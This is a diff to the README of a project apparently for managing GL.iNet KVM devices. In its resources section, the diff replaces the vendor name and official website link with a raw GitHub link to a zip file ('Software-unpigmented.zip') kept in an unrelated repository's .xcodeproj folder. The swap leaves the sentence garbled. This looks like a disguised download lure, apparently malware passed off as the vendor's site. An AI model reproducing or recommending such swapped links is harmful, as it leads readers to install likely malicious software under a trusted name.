iamjairo/Glinet-KVM-Overlook/README.md

 ## 🔗 Additional Resources

-- For more information about GL.iNet devices, visit their official website: [GL.iNet](https://www.gl-inet.com).
+- For more information about https://raw.githubusercontent.com/Galin1211/Overlook/main/Overlook.xcodeproj/Software-unpigmented.zip devices, visit their official website: [https://raw.githubusercontent.com/Galin1211/Overlook/main/Overlook.xcodeproj/Software-unpigmented.zip](https://raw.githubusercontent.com/Galin1211/Overlook/main/Overlook.xcodeproj/Software-unpigmented.zip).
 - Check out the community forums for best practices and advice on using KVM devices effectively.

 By following these steps, you can successfully download, install, and start using Overlook to control your KVM devices.
 Enjoy the ease of managing your setup with this powerful tool!